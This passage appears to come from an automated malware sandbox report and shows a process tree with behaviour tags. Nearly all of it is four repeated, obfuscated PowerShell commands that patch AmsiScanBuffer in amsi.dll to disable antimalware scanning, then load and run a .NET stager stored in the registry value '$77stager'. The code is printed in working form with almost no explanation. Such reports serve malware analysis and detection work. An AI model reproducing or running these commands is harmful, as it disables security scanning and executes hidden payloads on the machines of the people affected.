Char](87)+''+'A'+'R'+'E'+'').GetValue(''+'$'+''+[Char](55)+''+[Char](55)+''+[Char](115)+'t'+[Char](97)+'ge'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                          2⤵
                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                          • Command and Scripting Interpreter: PowerShell
                          • Drops file in System32 directory
                          • Suspicious use of SetThreadContext
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1432
                          • C:\Windows\System32\Conhost.exe
                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            3⤵
                              PID:4380
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:mwKHLMRidSqY{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$XNzxyIXoPCgHwE,[Parameter(Position=1)][Type]$EwUFcNJvrA)$XtPGePpDjPm=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+'f'+''+'l'+''+[Char](101)+''+'c'+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+'D'+''+[Char](101)+''+'l'+''+[Char](101)+'g'+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+'M'+'e'+''+[Char](109)+''+[Char](111)+''+'r'+'y'+[Char](77)+''+[Char](111)+''+[Char](100)+'u'+'l'+'e',$False).DefineType(''+[Char](77)+''+'y'+'D'+'e'+''+[Char](108)+'eg'+[Char](97)+'t'+[Char](101)+'T'+'y'+''+'p'+''+'e'+'',''+[Char](67)+''+[Char](108)+'a'+[Char](115)+''+'s'+','+[Char](80)+''+'u'+''+'b'+''+'l'+''+'i'+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+'d'+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+[Char](115)+''+[Char](105)+'C'+[Char](108)+'as'+[Char](115)+''+','+''+[Char](65)+''+'u'+'t'+'o'+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$XtPGePpDjPm.DefineConstructor('R'+[Char](84)+''+[Char](83)+''+[Char](112)+'e'+[Char](99)+'i'+[Char](97)+''+[Char](108)+''+[Char](78)+''+[Char](97)+''+'m'+''+'e'+','+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+''+'S'+''+[Char](105)+'g'+[Char](44)+''+[Char](80)+'ub'+[Char](108)+''+'i'+''+'c'+'',[Reflection.CallingConventions]::Standard,$XNzxyIXoPCgHwE).SetImplementationFlags('Ru'+[Char](110)+''+'t'+''+'i'+''+[Char](109)+''+'e'+','+'M'+'a'+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+''+'d'+'');$XtPGePpDjPm.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+'ok'+[Char](101)+'',''+'P'+''+[Char](117)+''+'b'+''+[Char](108)+''+'i'+''+'c'+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+'ig'+[Char](44)+''+[Char](78)+''+'e'+''+[Char](119)+''+'S'+''+[Char](108)+''+[Char](111)+''+'t'+''+','+''+'V'+''+'i'+'r'+'t'+''+[Char](117)+''+[Char](97)+''+'l'+'',$EwUFcNJvrA,$XNzxyIXoPCgHwE).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+''+'t'+''+'i'+'me'+','+'M'+[Char](97)+'n'+[Char](97)+'ge'+[Char](100)+'');Write-Output $XtPGePpDjPm.CreateType();}$QABXNndSkEXga=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+[Char](115)+''+[Char](116)+''+'e'+''+[Char](109)+''+[Char](46)+''+[Char](100)+''+'l'+''+[Char](108)+'')}).GetType('M'+[Char](105)+''+[Char](99)+''+[Char](114)+''+[Char](111)+''+'s'+''+[Char](111)+'ft'+[Char](46)+''+[Char](87)+'i'+[Char](110)+'3'+[Char](50)+''+[Char](46)+''+[Char](85)+''+'n'+''+[Char](115)+''+'a'+''+'f'+''+'e'+''+[Char](78)+'a'+[Char](116)+''+[Char](105)+''+'v'+'e'+[Char](77)+''+[Char](101)+''+[Char](116)+'hod'+[Char](115)+'');$RiBPJFuicuXQLZ=$QABXNndSkEXga.GetMethod('G'+[Char](101)+''+'t'+''+[Char](80)+'roc'+[Char](65)+''+[Char](100)+''+[Char](100)+''+'r'+''+[Char](101)+''+'s'+'s',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+'c,'+'S'+''+'t'+''+'a'+''+'t'+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$idcpSqgyeuEXkOkgQmJ=mwKHLMRidSqY @([String])([IntPtr]);$VEMUjGlPKnzhHiTYJmicSl=mwKHLMRidSqY @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$ytiMxqQwxWt=$QABXNndSkEXga.GetMethod(''+[Char](71)+''+[Char](101)+'t'+[Char](77)+''+[Char](111)+'d'+[Char](117)+''+[Char](108)+'e'+[Char](72)+''+[Char](97)+''+'n'+''+'d'+'l'+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+''+[Char](110)+''+'e'+'l'+[Char](51)+''+[Char](50)+''+'.'+'d'+[Char](108)+''+[Char](108)+'')));$oAuFaHXkYwJdlj=$RiBPJFuicuXQLZ.Invoke($Null,@([Object]$ytiMxqQwxWt,[Object](''+'L'+''+[Char](111)+''+[Char](97)+'d'+'L'+''+[Char](105)+''+[Char](98)+'ra'+[Char](114)+''+[Char](121)+'A')));$NiXCrFWvrnBqkuUtj=$RiBPJFuicuXQLZ.Invoke($Null,@([Object]$ytiMxqQwxWt,[Object]('V'+[Char](105)+''+'r'+''+[Char](116)+'u'+'a'+'lP'+'r'+'o'+'t'+''+'e'+''+[Char](99)+''+'t'+'')));$iLpFgIq=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($oAuFaHXkYwJdlj,$idcpSqgyeuEXkOkgQmJ).Invoke(''+[Char](97)+''+'m'+''+[Char](115)+'i'+[Char](46)+''+[Char](100)+''+[Char](108)+'l');$tSLCqiYZZMPTBJsst=$RiBPJFuicuXQLZ.Invoke($Null,@([Object]$iLpFgIq,[Object]('A'+'m'+'s'+[Char](105)+'S'+[Char](99)+''+'a'+''+[Char](110)+'B'+[Char](117)+'ffe'+[Char](114)+'')));$fVKMLUliJf=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($NiXCrFWvrnBqkuUtj,$VEMUjGlPKnzhHiTYJmicSl).Invoke($tSLCqiYZZMPTBJsst,[uint32]8,4,[ref]$fVKMLUliJf);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$tSLCqiYZZMPTBJsst,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($NiXCrFWvrnBqkuUtj,$VEMUjGlPKnzhHiTYJmicSl).Invoke($tSLCqiYZZMPTBJsst,[uint32]8,0x20,[ref]$fVKMLUliJf);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+''+'F'+''+[Char](84)+'W'+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+'$'+''+[Char](55)+''+[Char](55)+''+[Char](115)+'t'+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                            2⤵
                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                            • Command and Scripting Interpreter: PowerShell
                            • Drops file in System32 directory
                            • Suspicious use of SetThreadContext
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1500
                            • C:\Windows\System32\Conhost.exe
                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              3⤵
                                PID:3476
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:MhoLcaDlBTdx{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$PqWYyRtyDsivbU,[Parameter(Position=1)][Type]$AkXEBYWFZO)$hKFjBTMWJdV=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+'l'+''+'e'+''+[Char](99)+''+[Char](116)+''+[Char](101)+'d'+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+'g'+''+'a'+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+[Char](77)+''+'e'+''+'m'+''+[Char](111)+''+'r'+''+'y'+''+[Char](77)+''+[Char](111)+''+'d'+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+'e'+''+[Char](108)+'e'+[Char](103)+''+'a'+''+'t'+''+'e'+''+'T'+'yp'+'e'+'',''+[Char](67)+''+'l'+''+[Char](97)+''+'s'+''+'s'+''+[Char](44)+''+[Char](80)+''+'u'+'b'+[Char](108)+''+[Char](105)+'c,'+'S'+''+[Char](101)+''+'a'+''+[Char](108)+''+[Char](101)+''+'d'+''+','+''+[Char](65)+''+[Char](110)+'s'+'i'+'C'+'l'+''+'a'+'s'+[Char](115)+''+[Char](44)+''+[Char](65)+''+[Char](117)+''+[Char](116)+''+[Char](111)+''+[Char](67)+''+'l'+''+'a'+''+'s'+''+'s'+'',[MulticastDelegate]);$hKFjBTMWJdV.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+[Char](112)+'e'+[Char](99)+''+'i'+'a'+'l'+'N'+[Char](97)+''+[Char](109)+''+[Char](101)+',Hi'+[Char](100)+'eB'+[Char](121)+''+[Char](83)+''+'i'+''+'g'+''+','+''+'P'+'u'+[Char](98)+'l'+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$PqWYyRtyDsivbU).SetImplementationFlags(''+'R'+''+'u'+''+[Char](110)+''+[Char](116)+''+'i'+'m'+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+'ed');$hKFjBTMWJdV.DefineMethod('In'+'v'+''+[Char](111)+''+'k'+''+[Char](101)+'',''+'P'+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+'Hide'+[Char](66)+'yS'+[Char](105)+''+[Char](103)+''+[Char](44)+''+'N'+''+[Char](101)+'w'+[Char](83)+'lo'+[Char](116)+''+','+''+[Char](86)+'ir'+'t'+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$AkXEBYWFZO,$PqWYyRtyDsivbU).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+'t'+[Char](105)+'m'+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+'a'+'g'+[Char](101)+'d');Write-Output $hKFjBTMWJdV.CreateType();}$pTyPNXaDeOyGy=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+'y'+'s'+''+'t'+'e'+[Char](109)+'.'+[Char](100)+'ll')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+''+[Char](114)+''+[Char](111)+''+'s'+'of'+'t'+''+[Char](46)+''+[Char](87)+''+[Char](105)+'n3'+'2'+''+[Char](46)+''+[Char](85)+'ns'+[Char](97)+''+'f'+'e'+[Char](78)+'a'+[Char](116)+''+'i'+'v'+[Char](101)+''+'M'+''+'e'+''+'t'+'ho'+'d'+''+[Char](115)+'');$RbLcHQNdbWSVeW=$pTyPNXaDeOyGy.GetMethod('G'+'e'+''+'t'+'P'+'r'+''+[Char](111)+''+'c'+''+[Char](65)+''+[Char](100)+''+[Char](100)+'res'+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+'u'+''+'b'+''+[Char](108)+''+[Char](105)+'c,'+[Char](83)+''+[Char](116)+''+[Char](97)+''+'t'+'i'+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$lCNOxKzVrgVnpCpGMDl=MhoLcaDlBTdx @([String])([IntPtr]);$uBebUgTgPaqUfbXGzxJKDf=MhoLcaDlBTdx @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$kcYCHSWLaHJ=$pTyPNXaDeOyGy.GetMethod(''+[Char](71)+''+'e'+'t'+[Char](77)+''+[Char](111)+'d'+'u'+''+[Char](108)+''+[Char](101)+''+[Char](72)+'andl'+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+'e'+''+[Char](114)+''+[Char](110)+''+'e'+''+'l'+'3'+[Char](50)+''+[Char](46)+''+[Char](100)+''+[Char](108)+'l')));$ejwPfJwfLBryHO=$RbLcHQNdbWSVeW.Invoke($Null,@([Object]$kcYCHSWLaHJ,[Object](''+'L'+''+[Char](111)+''+[Char](97)+'d'+[Char](76)+''+[Char](105)+'b'+[Char](114)+''+[Char](97)+''+'r'+''+[Char](121)+''+'A'+'')));$TctKQwclrxmpOCHIM=$RbLcHQNdbWSVeW.Invoke($Null,@([Object]$kcYCHSWLaHJ,[Object]('V'+'i'+''+[Char](114)+''+'t'+''+'u'+'a'+'l'+''+[Char](80)+'r'+[Char](111)+''+[Char](116)+''+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$vQYrjny=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ejwPfJwfLBryHO,$lCNOxKzVrgVnpCpGMDl).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+'i'+'.'+''+[Char](100)+''+[Char](108)+'l');$HCLWgWTBXIzUpKQnk=$RbLcHQNdbWSVeW.Invoke($Null,@([Object]$vQYrjny,[Object](''+[Char](65)+'m'+[Char](115)+''+'i'+''+[Char](83)+''+[Char](99)+'a'+'n'+'Buff'+[Char](101)+'r')));$SuxrDIgKvd=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($TctKQwclrxmpOCHIM,$uBebUgTgPaqUfbXGzxJKDf).Invoke($HCLWgWTBXIzUpKQnk,[uint32]8,4,[ref]$SuxrDIgKvd);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$HCLWgWTBXIzUpKQnk,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($TctKQwclrxmpOCHIM,$uBebUgTgPaqUfbXGzxJKDf).Invoke($HCLWgWTBXIzUpKQnk,[uint32]8,0x20,[ref]$SuxrDIgKvd);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SO'+[Char](70)+'TW'+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue('$'+'7'+''+[Char](55)+'s'+[Char](116)+''+[Char](97)+'ge'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                              2⤵
                              • Suspicious use of NtCreateUserProcessOtherParentProcess
                              • Command and Scripting Interpreter: PowerShell
                              • Drops file in System32 directory
                              • Suspicious use of SetThreadContext
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3808
                              • C:\Windows\System32\Conhost.exe
                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                3⤵
                                  PID:2744
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:NrEIrlhTyUxK{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$kwjpVaGetQTqRO,[Parameter(Position=1)][Type]$hMZRjQhpvJ)$nHwCEhnhaOj=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+''+'l'+''+[Char](101)+'ct'+[Char](101)+'dDe'+'l'+''+'e'+''+[Char](103)+'a'+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+'M'+'e'+'m'+''+[Char](111)+'r'+[Char](121)+''+[Char](77)+'o'+[Char](100)+''+[Char](117)+''+'l'+''+[Char](101)+'',$False).DefineType('My'+[Char](68)+''+'e'+'l'+[Char](101)+''+[Char](103)+''+[Char](97)+''+'t'+''+[Char](101)+'T'+'y'+''+'p'+''+'e'+'',''+[Char](67)+'l'+'a'+''+'s'+'s'+','+''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+''+','+'S'+[Char](101)+'a'+[Char](108)+''+[Char](101)+'d,'+'A'+'n'+[Char](115)+''+[Char](105)+'Cl'+[Char](97)+'s'+'s'+''+','+''+'A'+''+[Char](117)+''+'t'+'o'+[Char](67)+'l'+[Char](97)+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$nHwCEhnhaOj.DefineConstructor('R'+'T'+''+'S'+''+[Char](112)+''+'e'+''+[Char](99)+''+'i'+''+[Char](97)+'l'+[Char](78)+''+[Char](97)+'m'+[Char](101)+''+[Char](44)+''+'H'+''+'i'+'d'+[Char](101)+''+[Char](66)+''+[Char](121)+'Si'+'g'+''+[Char](44)+''+[Char](80)+''+'u'+''+'b'+''+[Char](108)+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$kwjpVaGetQTqRO).SetImplementationFlags(''+[Char](82)+''+'u'+'n'+'t'+''+[Char](105)+''+'m'+'e,'+'M'+'a'+[Char](110)+''+[Char](97)+''+[Char](103)+''+'e'+'d');$nHwCEhnhaOj.DefineMethod(''+[Char](73)+''+'n'+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'','P'+'u'+'bli'+[Char](99)+',H'+'i'+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+'S'+''+[Char](105)+''+[Char](103)+''+','+''+'N'+''+'e'+''+'w'+''+'S'+'l'+'o'+''+[Char](116)+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+'r'+''+'t'+''+[Char](117)+'al',$hMZRjQhpvJ,$kwjpVaGetQTqRO).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+'t'+''+[Char](105)+''+'m'+''+'e'+','+[Char](77)+''+'a'+''+'n'+''+[Char](97)+''+[Char](103)+'e'+[Char](100)+'');Write-Output $nHwCEhnhaOj.CreateType();}$XMyAutZqPdfOY=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+'s'+'t'+'e'+''+[Char](109)+''+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+''+'c'+''+[Char](114)+''+[Char](111)+'so'+[Char](102)+'t'+'.'+''+'W'+'i'+[Char](110)+''+[Char](51)+''+[Char](50)+''+[Char](46)+'Uns'+'a'+''+[Char](102)+''+'e'+''+'N'+''+[Char](97)+''+[Char](116)+''+'i'+''+[Char](118)+'e'+[Char](77)+''+[Char](101)+'t'+[Char](104)+''+[Char](111)+''+[Char](100)+''+'s'+'');$uXGHMWevoIhnTt=$XMyAutZqPdfOY.GetMethod(''+[Char](71)+'etP'+'r'+''+[Char](111)+'cA'+'d'+'dr'+'e'+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+'u'+''+'b'+'l'+[Char](105)+''+'c'+''+','+''+[Char](83)+''+[Char](116)+''+[Char](97)+''+[Char](116)+'ic'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$FepzLBQruGzDBultzDF=NrEIrlhTyUxK @([String])([IntPtr]);$gQoIfBLCdNkzslSKErsXfM=NrEIrlhTyUxK @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$OOyTkcodZpq=$XMyAutZqPdfOY.GetMethod('G'+'e'+''+[Char](116)+''+'M'+''+[Char](111)+''+'d'+''+'u'+''+[Char](108)+'e'+[Char](72)+''+[Char](97)+''+[Char](110)+''+[Char](100)+''+[Char](108)+'e').Invoke($Null,@([Object](''+[Char](107)+'er'+[Char](110)+''+[Char](101)+''+'l'+''+[Char](51)+'2'+'.'+'d'+[Char](108)+''+[Char](108)+'')));$BMqscCJenpdUHn=$uXGHMWevoIhnTt.Invoke($Null,@([Object]$OOyTkcodZpq,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+[Char](100)+''+[Char](76)+''+[Char](105)+''+[Char](98)+''+[Char](114)+''+[Char](97)+'ry'+'A'+'')));$bGKNUFhLmaSvLUVOM=$uXGHMWevoIhnTt.Invoke($Null,@([Object]$OOyTkcodZpq,[Object](''+[Char](86)+'ir'+[Char](116)+''+[Char](117)+''+'a'+''+[Char](108)+''+[Char](80)+'r'+[Char](111)+''+[Char](116)+'e'+'c'+''+[Char](116)+'')));$kULtGLL=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BMqscCJenpdUHn,$FepzLBQruGzDBultzDF).Invoke('am'+'s'+''+'i'+''+[Char](46)+'d'+[Char](108)+''+[Char](108)+'');$mwFLgNPwlzjtwCqCU=$uXGHMWevoIhnTt.Invoke($Null,@([Object]$kULtGLL,[Object](''+'A'+''+[Char](109)+'si'+[Char](83)+''+[Char](99)+''+[Char](97)+''+[Char](110)+''+'B'+'u'+[Char](102)+''+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$DUhWGYMbaF=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($bGKNUFhLmaSvLUVOM,$gQoIfBLCdNkzslSKErsXfM).Invoke($mwFLgNPwlzjtwCqCU,[uint32]8,4,[ref]$DUhWGYMbaF);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$mwFLgNPwlzjtwCqCU,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($bGKNUFhLmaSvLUVOM,$gQoIfBLCdNkzslSKErsXfM).Invoke($mwFLgNPwlzjtwCqCU,[uint32]8,0x20,[ref]$DUhWGYMbaF);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+[Char](70)+''+'T'+''+[Char](87)+'ARE').GetValue(''+[Char](36)+''+[Char](55)+''+[Char](55)+''+[Char](115)+'t'+[Char](97)+''+'g'+'er')).EntryPoint.Invoke($Null,$Null)"
                                2⤵
                                • Suspicious use of NtCreateUserProcessOtherParentProcess
                                • Command and Scripting Interpreter: PowerShell
                                • Drops file in System32 directory
                                • Suspicious use of SetThreadContext
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4864
                                • C:\Windows\System32\Conhost.exe
                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  3⤵
                                    PID:744
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:ZEEJkaUoeImC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$KWAFfoYJFreypf,[Parameter(Position=1)][Type]$yhDkeXwFIy)$nzqHSqLGTeM=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('Ref'+[Char](108)+''+'e'+''+'c'+''+'t'+''+[Char](101)+''+'d'+''+[Char](68)+''+[Char](101)+''+'l'+''+[Char](101)+''+[Char](103)+''+[Char](97)+'t'+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+'M'+''+'e'+''+[Char](109)+'o'+[Char](114)+''+'y'+'M'+[Char](111)+''+[Char](100)+'u'+[Char](108)+'e',$False).DefineType('M'+[Char](121)+''+'D'+'e'+'l'+''+[Char](101)+''+[Char](103)+'a'+'t'+'e'+[Char](84)+''+'y'+'p'+[Char](101)+'',''+'C'+''+'l'+''+[Char](97)+'s'+[Char](115)+''+[Char](44)+''+'P'+''+'u'+''+[Char](98)+'l'+'i'+''+[Char](99)+''+','+'S'+'e'+''+[Char](97)+''+'l'+''+'e'+''+'d'+''+[Char](44)+''+'A'+''+[Char](110)+'s'+'i'+''+'C'+''+'l'+''+'a'+'s'+'s'+','+[Char](65)+'ut'+'o'+''+[Char](67)+'l'+'a'+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$nzqHSqLGTeM.DefineConstructor(''+[Char](82)+''+'T'+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+'i'+''+[Char](97)+''+[Char](108)+''+[Char](78)+''+[Char](97)+'me'+[Char](44)+''+'H'+'i'+'d'+''+[Char](101)+''+'B'+''+[Char](121)+'Si'+'g'+''+[Char](44)+''+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$KWAFfoYJFreypf).SetImplementationFlags('R'+'u'+''+[Char](110)+''+'t'+'i'+[Char](109)+''+[Char](101)+''+[Char](44)+'M'+[Char](97)+''+[Char](110)+''+'a'+'ged');$nzqHSqLGTeM.DefineMethod(''+[Char](73)+''+[Char](110)+''+'v'+''+[Char](111)+''+'k'+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](72)+''+'i'+''+[Char](100)+''+[Char](101)+''+'B'+'y'+[Char](83)+''+'i'+''+'g'+''+[Char](44)+'N'+[Char](101)+'wS'+[Char](108)+''+[Char](111)+''+[Char](116)+''+[Char](44)+''+'V'+''+'i'+'rt'+'u'+''+'a'+''+[Char](108)+'',$yhDkeXwFIy,$KWAFfoYJFreypf).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+''+[Char](105)+''+'m'+'e,'+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+''+[Char](100)+'');Write-Output $nzqHSqLGTeM.CreateType();}$mcyxnZRAsGZZt=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+'s'+[Char](116)+'e'+[Char](109)+'.'+[Char](100)+'ll')}).GetType(''+[Char](77)+''+'i'+''+'c'+'r'+[Char](111)+'so'+'f'+''+'t'+''+[Char](46)+''+'W'+''+'i'+''+'n'+''+[Char](51)+''+'2'+''+'.'+'U'+'n'+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+'t'+''+'i'+''+[Char](118)+'eM'+[Char](101)+''+'t'+'h'+'o'+'d'+[Char](115)+'');$ikzbAcLiAmDKoS=$mcyxnZRAsGZZt.GetMethod(''+'G'+'et'+[Char](80)+''+'r'+''+'o'+''+[Char](99)+''+[Char](65)+''+[Char](100)+''+[Char](100)+'r'+[Char](101)+'s'+[Char](115)+'',[Reflection.BindingFlags](''+'P'+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+[Char](83)+''+'t'+'a'+[Char](116)+'i'+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$uqJyFJZnUgVaVuMCKqR=ZEEJkaUoeImC @([String])([IntPtr]);$AENvPPKSuMQmGJmRjyZgvF=ZEEJkaUoeImC @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$MOJHFZacjlO=$mcyxnZRAsGZZt.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+[Char](77)+''+[Char](111)+'d'+[Char](117)+''+[Char](108)+'e'+'H'+'a'+'n'+''+'d'+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+'e'+'r'+'n'+''+'e'+''+'l'+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](100)+''+'l'+''+[Char](108)+'')));$oAofIYKDFGXlZo=$ikzbAcLiAmDKoS.Invoke($Null,@([Object]$MOJHFZacjlO,[Object]('Lo'+[Char](97)+'d'+[Char](76)+''+[Char](105)+''+[Char](98)+''+'r'+''+[Char](97)+''+'r'+''+[Char](121)+''+[Char](65)+'')));$gEhDZUCCeXgCLKDLL=$ikzbAcLiAmDKoS.Invoke($Null,@([Object]$MOJHFZacjlO,[Object](''+'V'+''+[Char](105)+'r'+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+'P'+'r'+''+[Char](111)+''+[Char](116)+''+[Char](101)+''+'c'+''+[Char](116)+'')));$gcgQkJW=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($oAofIYKDFGXlZo,$uqJyFJZnUgVaVuMCKqR).Invoke('ams'+[Char](105)+''+[Char](46)+'d'+[Char](108)+''+[Char](108)+'');$glDtlLBYuHfzOlqUS=$ikzbAcLiAmDKoS.Invoke($Null,@([Object]$gcgQkJW,[Object](''+[Char](65)+''+[Char](109)+''+'s'+''+[Char](105)+''+'S'+''+'c'+''+[Char](97)+''+'n'+''+[Char](66)+''+[Char](117)+''+[Char](102)+''+[Char](102)+''+[Char](101)+''+[